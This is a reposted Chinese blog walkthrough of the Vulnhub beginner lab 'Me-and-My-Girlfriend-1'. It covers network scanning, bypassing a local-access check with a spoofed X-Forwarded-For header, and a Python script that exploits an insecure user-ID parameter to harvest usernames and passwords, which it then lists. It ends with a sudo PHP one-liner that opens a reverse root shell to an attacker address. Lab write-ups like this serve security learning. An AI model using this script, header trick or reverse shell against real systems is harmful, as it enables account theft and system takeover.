【Vulnhub】靶机Me-and-My-Girlfriend-1

admin 2022年1月10日03:33:51安全博客评论3 views1690字阅读5分38秒阅读模式

前言

  • Vulnhub刷题简单记录

Me-and-My-Girlfriend-1

描述

描述:这个虚拟机告诉我们有一对恋人,爱丽丝和鲍勃,这对夫妇原本非常浪漫,但自从爱丽丝在一家私人公司“Ceban Corp”工作后,爱丽丝对鲍勃的态度发生了一些变化是“隐藏的”,Bob 请求您帮助获取 Alice 隐藏的内容并获得对公司的完全访问权限!

难度级别:初学者

注意:有 2 个标志文件

学习:Web 应用程序 | 简单的提权

https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/

Me-and-My-Girlfriend-1开始

1、可以用两种方法确认靶场的存在,扫ip

1
2
netdiscover -i eth0 -r 192.168.1.0/24
nmap -sn 192.168.1.0/24

2、扫目标端口开发情况

1
nmap -sV -sC -A 192.168.1.108

3、访问主页,根据提示说有一个password_resets,我们扫一下目录情况

1
2
3
gobuster dir -u http://192.168.1.104/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 200

dirb http://192.168.1.104/

4、进入主页,发下必须改x-forwarded-for为本地地址,所以下个插件改为127.0.0.1来访问

image-20210925154409342

5、注册之后,发现有平行越权获取用户的账号和密码,写个脚本跑一波

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
# coding:utf-8
import re
import requests

def get_UserInfo(id):
cookies = {
"PHPSESSID":"ve33ic8l6hhrn6004ul1binas3"
}
headers = {
"X-Forwarded-For": "127.0.0.1",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
}
res = requests.get("http://192.168.56.104/index.php?page=profile&user_id={}".format(id),headers=headers,cookies=cookies).text

name = re.search("name\" value=\"(.*?)\">",res).group(1)
username = re.search("rname\" value=\"(.*?)\">",res).group(1)
password = re.search("word\" value=\"(.*?)\">",res).group(1)
return name,username,password
for i in range(1,20):
name,username,password = get_UserInfo(i)
if name:
print(username+":"+password)

获取了密码

6、经典的爆破密码

image-20210925155049538

1
2
3
4
5
6
7
eweuhtandingan:skuyatuh
aingmaung:qwerty!!!
sundatea:indONEsia
sedihaingmah:cedihhihihi
alice:4lic3
abdikasepak:dorrrrr
gylq:gylq

7、登陆,拿flag

image-20210925155324774

8、简单提权

1
sudo -l发现php是可以无密码使用root权限

反弹root权限

1
sudo /usr/bin/php -r '$sock=fsockopen("192.168.56.1",4444);exec("/bin/sh -i <&3 >&3 2>&3");

image-20210925160619686

我的个人博客

孤桜懶契:http://gylq.gitee.io

FROM:gylq.gitee Author:孤桜懶契

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月10日03:33:51
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  【Vulnhub】靶机Me-and-My-Girlfriend-1 http://cn-sec.com/archives/730032.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: